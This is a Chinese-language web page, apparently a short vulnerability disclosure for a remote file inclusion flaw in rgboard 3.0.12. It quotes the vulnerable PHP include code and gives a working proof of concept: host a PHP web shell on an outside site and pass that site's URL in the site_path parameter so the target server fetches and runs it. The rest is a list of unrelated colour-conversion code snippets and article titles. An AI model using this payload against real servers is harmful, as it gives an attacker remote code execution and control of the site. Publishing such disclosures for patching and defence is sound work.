rgboard 3.0.12 远程文件包含漏洞
vul code:
\include\bbs.lib.inc.php:
if (!defined('BBS_LIB_INC_INCLUDED')) {
define('BBS_LIB_INC_INCLUDED', 1);
// *– BBS_LIB_INC_INCLUDED START –*
if(!$site_path) $site_path='./';
require_once “{$site_path}include/lib.inc.php”;
//$site_path没有过滤直接放过来包含了
poc:
在你的网站放个phpshell,目录和文件名为/include/lib.inc.php
然后访问
httP://www.target.com/include/bbs.lib.inc.php?site_path=http://yousite/
相关推荐
-
让IE支持RGBa的背景色的代码
上代码: Demo #div1 { padding: 10px; width: 380px; height: 205px; background: url(/upload/201007/20100713220102894.jpg); } #div2 { color: #FFF; font-size: 40px; font-weight: bold; text-align: center; height: 205px; line-height: 205px; background: rgba(12
-
javascript实现十六进制颜色值(HEX)和RGB格式相互转换
在日常开发中,经常会用到不同格式的颜色域值之间的相互转换,以下给出一种解决方法. 复制代码 代码如下: //十六进制颜色值的正则表达式 var reg = /^#([0-9a-fA-f]{3}|[0-9a-fA-f]{6})$/; /*RGB颜色转换为16进制*/ String.prototype.colorHex = function(){ var that = this; if(/^(rgb|RGB)/.test(that)){ var aColor = th
-
php Imagick获取图片RGB颜色值
很多图片站点都会根据用户上传的图片检索出图片的主要颜色值,然后在通过颜色搜索相关的图片. 之前按照网上的方法将图片缩放(或者马赛克)然后遍历每个像素点,然后统计处RGB次数最多的值,这做法效率太低而且取到的RGB值不够精确.之后才发现使用Imagick的quantizeImage方法能够很方便的取到图片中平均的RGB值. $average = new Imagick("xiaocai.jpg"); $average->quantizeImage( 10, Imagick::COL
-
RGB和YUV 多媒体编程基础详细介绍
RGB和YUV 多媒体编程 一.概念 1.什么是RGB? 对一种颜色进行编码的方法统称为"颜色空间"或"色域".用最简单的话说,世界上任何一种颜色的"颜色空间"都可定义成一个固定的数字或变量.RGB(红.绿.蓝)只是众多颜色空间的一种.采用这种编码方法,每种颜色都可用三个变量来表示-红色绿色以及蓝色的强度.记录及显示彩色图像时,RGB是最常见的一种方案. 2.什么是YUV? YUV是被欧洲电视系统所采用的一种颜色编码方法(属于PAL),是PAL和
-
javascript实现rgb颜色转换成16进制格式
自己试过很好用 function zero_fill_hex(num, digits) { var s = num.toString(16); while (s.length < digits) s = "0" + s; return s; } function rgb2hex(rgb) { if (rgb.charAt(0) == '#') return rgb; var ds = rgb.split(/\D+/); var decimal = Number(ds[1]) *
-
PHP实现将颜色hex值转换成rgb的方法
本文实例讲述了PHP实现将颜色hex值转换成rgb的方法.分享给大家供大家参考,具体如下: function hex2rgb( $colour ) { if ( $colour[0] == '#' ) { $colour = substr( $colour, 1 ); } if ( strlen( $colour ) == 6 ) { list( $r, $g, $b ) = array( $colour[0] . $colour[1], $colour[2] . $colour[3], $co
-
Android-如何将RGB彩色图转换为灰度图方法介绍
实例:RGB2Grey 项目运行效果图: 源代码: [java] public class MainActivity extends Activity { /* (non-Javadoc) * @see android.app.Activity#onCreate(android.os.Bundle) */ @Override public void onCreate(Bundle savedInstanceState) { sup
-
php Hex RGB颜色值互换的使用
复制代码 代码如下: <?phpecho implode ( ",", HexToRGB ( "#F7F7DA" ) ) . "<br/>";echo RGBToHex ( "rgb(247,247,218)" )?><?php function HexToRGB($colour) { if ($colour [0] == '#') { $colour = substr ( $
-
RGB颜色值转HTML十六进制(HEX)代码的JS函数
复制代码 代码如下: //转到固定长度的十六进制字符串,不够则补0 function zero_fill_hex(num, digits) { var s = num.toString(16); while (s.length < digits) s = "0" + s; return s; } //妈的,怎么都没搜到怎么用javascript找出一个背景色的数值,只好自己解析 function rgb2hex(rgb) { //nnd, Firefox / IE not the
-
JavaScript 十六进制RGB色码转换器
十六进制RGB色码转换器 风越ASP代码生成器 255) x=255 if(x =0 && curD.style.pixelLeft255){ curD.style.pixelLeft=255; //alert("Sorry, but you can not have RGB values that are over 255!") eval(curD.value+"_value").innerHTML=curD.style.pixelLeft } i
随机推荐
- java中File类的使用方法
- 实例讲解Python中的私有属性
- ajax 技术和原理分析
- ASP.NET core Web中使用appsettings.json配置文件的方法
- JavaScript控制各种浏览器全屏模式的方法、属性和事件介绍
- JavaScript基础之流程控制语句的用法
- PHP中使用循环实现的金字塔图形
- 浅谈php中的循环while、do...while、for、foreach四种循环
- 把项目从Python2.x移植到Python3.x的经验总结
- Golang正整数指定规则排序算法问题分析
- Ajax PHP 边学边练 之三 数据库
- python实现忽略大小写对字符串列表排序的方法
- jQuery处理图片加载失败的常用方法
- FileSystemObject 对象
- Javascript调用函数方法的几种方式介绍
- Java 字节数组类型(byte[])与int类型互转方法
- C#三种判断数据库中取出的字段值是否为空(NULL) 的方法
- C#中fixed关键字的作用总结
- 推荐几个开源的微信开发项目
- C#利用WebClient实现两种方式下载文件